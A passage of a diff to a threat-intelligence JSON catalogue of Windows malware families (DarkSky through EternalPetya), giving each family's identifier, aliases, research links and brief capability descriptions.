The DDoS attacks that DarkSky can perform include DNS amplification attacks, TCP (SYN) flood, UDP flood, and HTTP flood. The botnet can also perform a check to determine whether or not the DDoS attack succeeded and turn infected systems into a SOCKS/HTTP proxy to route traffic to a remote server." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkstrat", + "https://www.welivesecurity.com/2014/11/12/korplug-military-targeted-attacks-afghanistan-tajikistan/" + ] + }, + "uuid": "b9692126-e6e9-4ab3-8494-959fd1269ff4", + "value": "DarkStRat", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktequila", + "https://securelist.com/dark-tequila-anejo/87528/" + ] + }, + "uuid": "374080b4-5e6c-4992-a7f5-def1f2975494", + "value": "DarkTequila", + "description": "Dark Tequila is a complex malicious campaign targeting Mexican users, with the primary purpose of stealing financial information, as well as login credentials to popular websites that range from code versioning repositories to public file storage accounts and domain registrars." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktrack_rat", + "http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml", + "https://nioguard.blogspot.de/2017/05/targeted-attack-against-ukrainian.html" + ] + }, + "uuid": "fc91803f-610c-4ad5-ba0c-b78d65abc6db", + "value": "Darktrack RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Muirim", + "Nioupale" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.daserf", + "https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" + ] + }, + "uuid": "70f6c71f-bc0c-4889-86e3-ef04e5b8415b", + "value": "Daserf", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.datper", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", + "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html" + ] + }, + "uuid": "827490bf-19b8-4d14-83b3-7da67fbe436c", + "value": "Datper", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkong", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" + ] + }, + "uuid": "cae8384d-b01b-4f9c-a31b-f693e12ea6b2", + "value": "DDKONG", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.decebal", + "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf", + "https://community.softwaregrp.com/t5/Security-Research/POS-malware-a-look-at-Dexter-and-Decebal/ba-p/272157", + "https://www.fireeye.com/blog/threat-research/2014/10/data-theft-in-aisle-9-a-fireeye-look-at-threats-to-retailers.html" + ] + }, + "uuid": "fba088fb-2659-48c3-921b-12c6791e6d58", + "value": "Decebal", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.deltas", + "https://www.arbornetworks.com/blog/asert/pivoting-off-hidden-cobra-indicators/" + ] + }, + "uuid": "0be67307-670d-4558-bcf7-1387047bca4b", + "value": "Delta(Alfa,Bravo, ...)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dented" + ] + }, + "uuid": "0404cb3e-1390-4010-a368-80ee585ddd59", + "value": "Dented", + "description": "Dented is a banking bot written in C. It supports IE, Firefox, Chrome, Opera and Edge and comes with a simple POS grabber. Due to its modularity, reverse socks 5, tor and vnc can be added." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.deputydog", + "https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html" + ] + }, + "uuid": "ff4254e5-f301-4804-9a0f-e010af56576c", + "value": "DeputyDog", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.deria_lock", + "https://twitter.com/struppigel/status/812601286088597505" + ] + }, + "uuid": "52e0bcba-e352-4d7b-82ee-9169f18dca5a", + "value": "DeriaLock", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi", + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf", + "http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf", + "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/" + ] + }, + "uuid": "7ea00126-add3-407e-b69d-d4aa1b3049d5", + "value": "Derusbi", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.devils_rat" + ] + }, + "uuid": "44168d77-338d-46ad-a5f6-c17c2b6b0631", + "value": "Devil's Rat", + "description": "" + }, + { + "meta": { + "synonyms": [ + "LusyPOS" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexter", + "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/25000/PD25658/en_US/McAfee_Labs_Threat_Advisory-LusyPOS.pdf", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Dexter-Malware--Getting-Your-Hands-Dirty/", + "https://blog.fortinet.com/2014/03/10/how-dexter-steals-credit-card-information", + "https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html", + 
"http://contagiodump.blogspot.com/2012/12/dexter-pos-infostealer-samples-and.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/", + "https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html" + ] + }, + "uuid": "f44e6d03-54c0-47af-b228-0040299c349c", + "value": "Dexter", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.de_loader", + "https://blog.fortinet.com/2016/06/21/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users", + "https://blogs.forcepoint.com/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks", + "https://int0xcc.svbtle.com/dissecting-obfuscated-deloader-malware" + ] + }, + "uuid": "d0c6df05-8d89-4ce8-8ea2-8a4f617fa8f2", + "value": "DE Loader", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Crysis", + "Arena" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma", + "https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/" + ] + }, + "uuid": "9c90b876-e94d-4ea5-9f30-fdc6dd6b5aef", + "value": "Dharma", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Crystal", + "Gorynych", + "Gorynch" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.diamondfox", + "https://www.scmagazine.com/inside-diamondfox/article/578478/", + "https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/", + "https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/", + "http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/", + "https://blog.cylance.com/a-study-in-bots-diamondfox" + ] + }, + "uuid": "7368ab0c-ef4b-4f53-a746-f150b8afa665", + "value": "DiamondFox", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dimnie", + "http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/" + ] + }, + "uuid": "8f5ce8a6-c5fe-4c62-b25b-6ce0f3b724c5", + "value": "Dimnie", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dircrypt", + "https://www.johannesbader.ch/2015/03/the-dga-of-dircrypt/", + "https://www.checkpoint.com/download/public-files/TCC_WP_Hacking_The_Hacker.pdf" + ] + }, + "uuid": "61b2dd12-2381-429d-bb64-e3210804a462", + "value": "DirCrypt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.disttrack", + "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis", + "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412", + "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon", + "http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware", + "http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/", + "http://contagiodump.blogspot.com/2012/08/shamoon-or-disttracka-samples.html" + ] + }, + "uuid": "25d03501-1fe0-4d5e-bc75-c00fbdaa83df", + "value": "DistTrack", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dma_locker", + "https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/", + "https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-strikes-back/", + "https://blog.malwarebytes.com/threat-analysis/2016/05/dma-locker-4-0-known-ransomware-preparing-for-a-massive-distribution/" + ] + }, + "uuid": 
"1248cdf7-4180-4098-b1d0-389aa523a0ed", + "value": "DMA Locker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnsmessenger", + "https://blog.talosintelligence.com/2017/03/dnsmessenger.html", + "http://wraithhacker.com/2017/10/11/more-info-on-evolved-dnsmessenger/", + "https://blog.talosintelligence.com/2017/10/dnsmessenger-sec-campaign.html" + ] + }, + "uuid": "b376580e-aba1-4ac9-9c2d-2df429efecf6", + "value": "DNSMessenger", + "description": "DNSMessenger makes use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker." + }, + { + "meta": { + "synonyms": [ + "Shelma" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.doghousepower", + "http://www1.paladion.net/hubfs/Newsletter/DogHousePower-%20Newly%20Identified%20Python-Based%20Ransomware.pdf" + ] + }, + "uuid": "14d3518a-d8cb-4fbd-80aa-8bec4fc8ad13", + "value": "DogHousePower", + "description": "DogHousePower is a PyInstaller-based ransomware targeting web and database servers. It is delivered through a PowerShell downloader and was hosted on Github." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorkbot_ngrbot", + "https://securingtomorrow.mcafee.com/mcafee-labs/ngrbot-spreads-via-chat/", + "http://stopmalvertising.com/rootkits/analysis-of-ngrbot.html", + "https://research.checkpoint.com/dorkbot-an-investigation/" + ] + }, + "uuid": "91191c0a-96d8-40b8-b8fb-daa0ad009c87", + "value": "NgrBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorshel", + "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" + ] + }, + "uuid": "d3b5a884-1fd6-4cc4-9837-7d8ee8817711", + "value": "Dorshel", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublepulsar", + "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/", + "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", + "https://countercept.com/our-thinking/analyzing-the-doublepulsar-kernel-dll-injection-technique/", + "https://countercept.com/our-thinking/doublepulsar-usermode-analysis-generic-reflective-dll-loader/" + ] + }, + "uuid": "32984744-c0f9-43f7-bfca-c3276248a4fa", + "value": "DoublePulsar", + "description": "" + }, + { + "meta": { + "synonyms": [ + "DELPHACY" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.downdelph", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf" + ] + }, + "uuid": "e6a077cb-42cc-4193-9006-9ceda8c0dff2", + "value": "Downdelph", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.downeks", + 
"http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments/?adbsc=social69739136&adbid=826218465723756545&adbpl=tw&adbpr=4487645412" + ] + }, + "uuid": "c8149b45-7d28-421e-bc6f-25c4b8698b92", + "value": "Downeks", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.downpaper", + "http://www.clearskysec.com/charmingkitten/" + ] + }, + "uuid": "227862fd-ae83-4e3d-bb69-cc1a45a13aed", + "value": "DownPaper", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dramnudge" + ] + }, + "uuid": "627a044b-1c84-409c-9f58-95b46d5d51ba", + "value": "DramNudge", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dreambot", + "https://lokalhost.pl/gozi_tree.txt", + "https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality" + ] + }, + "uuid": "ac4fbbb0-9a21-49ce-be82-e44cb02a7819", + "value": "DreamBot", + "description": "2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n2014 Dreambot (Gozi ISFB variant)\r\n\r\nIn 2014, a variant of Gozi ISFB was developed. Mainly, the dropper performs additional anti-vm checks (vmware, vbox, qemu), while the actual bot-dll remains unchanged in most parts. New functionality, such as TOR support, was added though and often, the Fluxxy fast-flux network is used.\r\n\r\nSee win.gozi for additional historical information." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex", + "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", + "https://blogs.it.ox.ac.uk/oxcert/2015/11/09/major-dridex-banking-malware-outbreak/", + "https://securityintelligence.com/dridexs-cold-war-enter-atombombing/", + "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", + "https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps", + "https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/", + "https://viql.github.io/dridex/", + "https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/", + "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" + ] + }, + "uuid": "b4216929-1626-4444-bdd7-bfd4b68a766e", + "value": "Dridex", + "description": "OxCERT blog describes Dridex as \"an evasive, information-stealing malware variant; its goal is to acquire as many credentials as possible and return them via an encrypted tunnel to a Command-and-Control (C&C) server. These C&C servers are numerous and scattered all over the Internet, if the malware cannot reach one server it will try another. For this reason, network-based measures such as blocking the C&C IPs is effective only in the short-term.\"\r\nAccording to MalwareBytes, \"Dridex uses an older tactic of infection by attaching a Word document that utilizes macros to install malware. However, once new versions of Microsoft Office came out and users generally updated, such a threat subsided because it was no longer simple to infect a user with this method.\"\r\nIBM X-Force discovered \"a new version of the Dridex banking Trojan that takes advantage of a code injection technique called AtomBombing to infect systems. 
AtomBombing is a technique for injecting malicious code into the 'atom tables' that almost all versions of Windows uses to store certain application data. It is a variation of typical code injection attacks that take advantage of input validation errors to insert and to execute malicious code in a legitimate process or application. Dridex v4 is the first malware that uses the AtomBombing process to try and infect systems.\"" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dropshot", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", + "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-1/", + "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-2/" + ] + }, + "uuid": "cfdb02f2-a767-4abb-b04c-333a02cdd7e2", + "value": "DROPSHOT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dtbackdoor" + ] + }, + "uuid": "cc5abb0c-7f33-4a82-a92e-0070fd602ba5", + "value": "DtBackdoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dualtoy", + "https://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" + ] + }, + "uuid": "8269e779-db23-4c94-aafb-36ee94879417", + "value": "DualToy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubnium_darkhotel", + "https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2/3/", + "http://blog.jpcert.or.jp/2016/06/asruex-malware-infecting-through-shortcut-files.html", + "https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/", + 
"https://labs.bitdefender.com/wp-content/uploads/downloads/inexsmar-an-unusual-darkhotel-campaign/" + ] + }, + "uuid": "309d0745-bbfd-43bc-b2c4-511592a475bf", + "value": "DarkHotel", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubrute", + "https://github.com/ch0sys/DUBrute" + ] + }, + "uuid": "2236a08f-dfbd-4f92-9d73-a895c34766ad", + "value": "DUBrute", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dumador" + ] + }, + "uuid": "ea59906d-b5e1-4749-8494-9ad9a09510b5", + "value": "Dumador", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.duqu", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet_research.pdf" + ] + }, + "uuid": "7344cee0-87c9-46a1-85aa-0d3c8c9c8cc6", + "value": "DuQu", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.duuzer", + "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" + ] + }, + "uuid": "a5eb921e-17db-46de-a907-09f9ad05a7d7", + "value": "Duuzer", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Dyreza" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre", + "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/", + "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates", + "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf" + ] + }, + "uuid": "1ecbcd20-f238-47ef-874b-08ef93266395", + "value": "Dyre", + "description": "" + }, + { + "meta": { + "synonyms": 
[], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.eda2_ransom", + "https://twitter.com/JaromirHorejsi/status/815861135882780673" + ] + }, + "uuid": "24fe5fef-6325-4c21-9c35-a0ecd185e254", + "value": "EDA2", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ehdevel", + "https://labs.bitdefender.com/2017/09/ehdevel-the-story-of-a-continuously-improving-advanced-threat-creation-toolkit/" + ] + }, + "uuid": "257da597-7e6d-4405-9b10-b4206bb013ca", + "value": "EHDevel", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.elirks", + "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" + ] + }, + "uuid": "eb189fd3-ca39-4bc7-be2d-4ea9e89d9ab9", + "value": "Elirks", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.elise", + "https://securelist.com/blog/research/70726/the-spring-dragon-apt/", + "https://www.accenture.com/t20180127T003755Z__w__/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf", + "https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", + "https://www.joesecurity.org/blog/8409877569366580427" + ] + }, + "uuid": "3477a25d-e04b-475e-8330-39f66c10cc01", + "value": "Elise", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.emdivi", + "http://blog.trendmicro.com/trendlabs-security-intelligence/attackers-target-organizations-in-japan-transform-local-sites-into-cc-servers-for-emdivi-backdoor/", + 
"http://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/", + "https://securelist.com/new-activity-of-the-blue-termite-apt/71876/", + "http://blog.jpcert.or.jp/2015/11/decrypting-strings-in-emdivi.html" + ] + }, + "uuid": "6bf7aa6a-3003-4222-805e-776cb86dc78a", + "value": "Emdivi", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.empire_downloader", + "https://twitter.com/thor_scanner/status/992036762515050496" + ] + }, + "uuid": "aa445513-9616-4f61-a72d-7aff4a10572b", + "value": "Empire Downloader", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Lurid" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal", + "https://www.bsk-consulting.de/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/", + "http://la.trendmicro.com/media/misc/lurid-downloader-enfal-report-en.pdf", + "https://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin/" + ] + }, + "uuid": "2a4cacb7-80a1-417e-8b9c-54b4089f35d9", + "value": "Enfal", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationdrug", + "http://artemonsecurity.blogspot.com/2017/03/equationdrug-rootkit-analysis-mstcp32sys.html", + "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/", + "https://securelist.com/inside-the-equationdrug-espionage-platform/69203/", + "https://cdn.securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf" + ] + }, + "uuid": "c4490972-3403-4043-9d61-899c0a440940", + "value": "EquationDrug", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationgroup", + "https://laanwj.github.io/2016/09/23/seconddate-adventures.html", + 
"https://laanwj.github.io/2016/09/17/seconddate-cnc.html", + "https://laanwj.github.io/2016/09/13/blatsting-rsa.html", + "https://laanwj.github.io/2016/09/11/buzzdirection.html", + "https://laanwj.github.io/2016/09/09/blatsting-lp-transcript.html", + "https://laanwj.github.io/2016/09/04/blatsting-command-and-control.html", + "https://laanwj.github.io/2016/09/01/tadaqueos.html", + "https://laanwj.github.io/2016/08/28/feintcloud.html", + "https://laanwj.github.io/2016/08/22/blatsting.html" + ] + }, + "uuid": "35c1abaf-8dee-48fe-8329-f6e5612eb7af", + "value": "Equationgroup (Sorting)", + "description": "Rough collection EQGRP samples, to be sorted" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.erebus", + "https://www.bleepingcomputer.com/news/security/erebus-ransomware-utilizes-a-uac-bypass-and-request-a-90-ransom-payment/" + ] + }, + "uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864", + "value": "Erebus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.eredel", + "https://webcache.googleusercontent.com/search?q=cache:3hU62-Lr2t8J:hXXps://www.nulled.to/topic/486274-eredel-stealer-lite-private-having-control-via-the-web-panel-multifunctional-stealer/+&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-ab" + ] + }, + "uuid": "acd2555d-b4a1-47b4-983a-fb7b3a402dab", + "value": "Eredel", + "description": "Eredel Stealer is a low price malware that allows for extracting passwords, cookies, screen desktop from browsers and programs.\r\n\r\nAccording to nulled[.]to:\r\n\r\nSupported browsers\r\nChromium Based: Chromium, Google Chrome, Kometa, Amigo, Torch, Orbitum, Opera, Opera Neon, Comodo Dragon, Nichrome (Rambler), Yandex Browser, Maxthon5, Sputnik, Epic Privacy Browser, Vivaldi, CocCoc and other Chromium Based browsers.\r\n\r\n- Stealing FileZilla\r\n- Stealing an account from Telegram\r\n- Stealing AutoFill\r\n- Theft 
of wallets: Bitcoin | Dash | Monero | Electrum | Ethereum | Litecoin\r\n- Stealing files from the desktop. Supports any formats, configurable via telegram-bot" + }, + { + "meta": { + "synonyms": [ + "ExPetr", + "Pnyetya", + "Petna", + "NotPetya", + "Nyetya", + "NonPetya", + "nPetya", + "Diskcoder.C", + "BadRabbit" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternal_petya", + "https://securelist.com/schroedingers-petya/78870/", + "https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/", + "https://securelist.com/from-blackenergy-to-expetr/78937/", + "https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4", + "https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/", + "https://labsblog.f-secure.com/2017/06/29/petya-i-want-to-believe/", + "http://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-was-smokescreen.html", + "https://blog.comae.io/petya-2017-is-a-wiper-not-a-ransomware-9ea1d8961d3b", + "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-lost-salsa20-key/", + "https://www.bleepingcomputer.com/news/security/ransomware-attacks-continue-in-ukraine-with-mysterious-wannacry-clone/", + "http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html", + "https://labsblog.f-secure.com/2017/06/30/eternal-petya-from-a-developers-perspective/", + "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/", + "https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/", + "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-yet-another-stolen-piece-package/", + "https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/", + "https://www.gdatasoftware.com/blog/2017/07/29859-who-is-behind-petna", + 
"https://www.crowdstrike.com/blog/fast-spreading-petrwrap-ransomware-attack-combines-eternalblue-exploit-credential-stealing/", + "https://www.crowdstrike.com/blog/petrwrap-technical-analysis-part-2-further-findings-and-potential-for-mbr-recovery/", + "https://www.theguardian.com/technology/2017/jul/03/notpetya-malware-attacks-ukraine-warrant-retaliation-nato-researcher-tomas-minarik", + "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", + "https://threatpost.com/ukrainian-man-arrested-charged-in-notpetya-distribution/127391/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/eternalglue-part-one-rebuilding-notpetya-to-assess-real-world-resilience/", + "https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/?utm_content=buffer8ffe4&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer", + "https://securelist.com/bad-rabbit-ransomware/82851/", + "https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/", + "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/", + "http://blog.talosintelligence.com/2017/10/bad-rabbit.html", + "http://www.intezer.com/notpetya-returns-bad-rabbit/", + "https://www.riskiq.com/blog/labs/badrabbit/", + "https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html", + "https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/", + "https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-badrabbit-encryption-routine-specifics.html", + 